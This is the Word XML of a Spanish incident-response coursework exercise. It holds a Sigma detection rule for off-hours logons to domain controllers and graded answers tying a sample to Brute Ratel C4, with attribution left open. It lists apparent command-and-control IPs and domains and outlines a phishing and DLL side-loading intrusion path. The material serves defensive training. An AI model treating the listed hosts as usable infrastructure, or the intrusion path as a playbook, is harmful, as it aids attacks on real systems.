      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">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17</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">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18</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">condition</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selection_logon and selection_dc and not business_hours</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">falsepositives</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8B">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Tareas de administración o mantenimiento fuera de horario previamente autorizadas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">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Procesos automatizados o herramientas de monitorización</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">level</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high</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="240" w:line="335.99999999999994" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La detección se basa en el evento 4624 de Windows, que registra inicios de sesión exitosos, y filtra los tipos de logon 3 y 10, correspondientes a accesos de red y RDP. Se centra en los controladores de dominio porque son activos especialmente críticos y cualquier acceso no autorizado a ellos puede comprometer al resto de la infraestructura. Además, se define como horario habitual el intervalo entre las 08:00 y las 19:00 para reducir ruido y destacar accesos fuera de esa franja, que resultan menos comunes y, por tanto, más sospechosos. Aun así, la regla puede generar falsos positivos en casos de mantenimiento o administración autorizada fuera de horario.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="397" w:hanging="397"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n7jm2qw6ukol" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Punto evaluable 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Liberation Serif" w:cs="Liberation Serif" w:eastAsia="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="6aa84f"/>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6aa84f"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Valor: +2,5 puntos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:spacing w:after="100" w:lineRule="auto"/>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Respuesta: </w:t>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40" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1434" w:right="0" w:hanging="357"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>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Texto libre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7">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color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Se ha realizado la búsqueda en VirusTotal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">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color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5976310" cy="2857500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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7631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top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f497d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f497d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f497d"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pregunta 1 – </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tras analizar el hash en VirusTotal, se observan comunicaciones con varias IP, entre ellas 185.106.92.54 y 82.115.223.40 por el puerto 8041. También aparece tráfico hacia 64.233.181.94 por el puerto 443 y resoluciones DNS para los dominios </w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="0088cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="white"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">bazarunet.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="0088cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="white"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">tiguanin.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="0088cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="white"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">greshunka.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Los dos primeros indicadores son los que encajan mejor con infraestructura sospechosa vista en la muestra; en cambio, una conexión aislada por 443 a una IP pública no debe etiquetarse automáticamente como C2 sin más contexto.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f497d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f497d"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pregunta 2 – </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Con la información disponible, la muestra puede relacionarse con Badger, el agente asociado a Brute Ratel C4 (BRc4). Brute Ratel es una herramienta comercial de red teaming que, según MITRE ATT&amp;CK, también ha sido utilizada en campañas maliciosas reales. Además, el uso de DLL Side-Loading o de técnicas similares de carga de DLL encaja con comportamientos documentados para este tipo de herramienta, ya que permite ejecutar código malicioso apoyándose en binarios legítimos</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f497d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f497d"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pregunta 3 – </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> El uso de Brute Ratel se ha visto en campañas de actores avanzados, incluso grupos APT. Sin embargo, no sería correcto atribuir esta muestra a un actor concreto solo por esa coincidencia, porque se trata de una herramienta reutilizable y no exclusiva de un único grupo. Por tanto, con la evidencia disponible, lo correcto es dejar la atribución abierta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f497d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f497d"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pregunta 4 – </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Un vector de entrada plausible, y además documentado en campañas que emplean herramientas de este tipo, es el spear phishing mediante correos con adjuntos como ISO, LNK o ZIP. A partir de ahí, la infección puede apoyarse en técnicas de DLL Side-Loading para ejecutar el malware aprovechando binarios legítimos. De cara al análisis forense, revisaría el correo del usuario afectado, las descargas recientes y la ejecución de procesos en rutas temporales para reconstruir el origen del compromiso.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId21" w:type="default"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:h="16838" w:w="11906" w:orient="portrait"/>
      <w:pgMar w:bottom="709" w:top="907" w:left="1247" w:right="1247" w:header="567" w:footer="39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Courier New"/>
  <w:font w:name="Liberation Sans"/>
  <w:font w:name="Noto Sans Symbols">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId1" w:subsetted="0"/>
    <w:embedBold w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId2" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Kreon">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId3" w:subsetted="0"/>
    <w:embedBold w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId4"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Bdr>
        <w:top w:space="0" w:sz="0" w:val="nil"/>
        <w:left w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:space="0" w:sz="0" w:val="nil"/>
        <w:right w:space="0" w:sz="0" w:val="nil"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Liberation Sans" w:cs="Liberation Sans" w:eastAsia="Liberation Sans" w:hAnsi="Liberation Sans"/>
        <w:color w:val="000000"/>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jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Liberation Sans" w:cs="Liberation Sans" w:eastAsia="Liberation Sans" w:hAnsi="Liberation Sans"/>
        <w:color w:val="000000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>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jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Liberation Sans" w:cs="Liberation Sans" w:eastAsia="Liberation Sans" w:hAnsi="Liberation Sans"/>
        <w:color w:val="000000"/>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Bdr>
        <w:top w:space="0" w:sz="0" w:val="nil"/>
        <w:left w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:space="0" w:sz="0" w:val="nil"/>
        <w:right w:space="0" w:sz="0" w:val="nil"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Liberation Sans" w:cs="Liberation Sans" w:eastAsia="Liberation Sans" w:hAnsi="Liberation Sans"/>
        <w:color w:val="000000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="1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120" w:lineRule="auto"/>
      <w:ind w:left="-709" w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="Liberation Sans" w:cs="Liberation Sans" w:eastAsia="Liberation Sans" w:hAnsi="Liberation Sans"/>
        <w:color w:val="000000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>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left" w:leader="none" w:pos="5338"/>
      </w:tabs>
      <w:ind w:left="-709" w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="a90a2e"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="a90a2e"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Introducción a la respuesta a incidentes | Práctica | Pág. </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="a90a2e"/>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a90a2e"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve"> de </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="a90a2e"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="1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jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Liberation Sans" w:cs="Liberation Sans" w:eastAsia="Liberation Sans" w:hAnsi="Liberation Sans"/>
        <w:color w:val="000000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>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394"/>
        <w:tab w:val="right" w:leader="none" w:pos="8789"/>
      </w:tabs>
      <w:rPr>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>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6" w:lineRule="auto"/>
      <w:rPr>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:tbl>
    <w:tblPr>
      <w:tblStyle w:val="Table2"/>
      <w:tblW w:w="9520.0" w:type="dxa"/>
      <w:jc w:val="left"/>
      <w:tblBorders>
        <w:top w:color="000000" w:space="0" w:sz="0" w:val="nil"/>
        <w:left w:color="000000" w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:color="666666" w:space="0" w:sz="4" w:val="single"/>
        <w:right w:color="000000" w:space="0" w:sz="0" w:val="nil"/>
        <w:insideH w:color="666666" w:space="0" w:sz="4" w:val="single"/>
        <w:insideV w:color="666666" w:space="0" w:sz="4" w:val="single"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblLook w:val="0400"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="1843"/>
      <w:gridCol w:w="7677"/>
      <w:tblGridChange w:id="0">
        <w:tblGrid>
          <w:gridCol w:w="1843"/>
          <w:gridCol w:w="7677"/>
        </w:tblGrid>
      </w:tblGridChange>
    </w:tblGrid>
    <w:tr>
      <w:trPr>
        <w:cantSplit w:val="0"/>
        <w:trHeight w:val="558" w:hRule="atLeast"/>
        <w:tblHeader w:val="0"/>
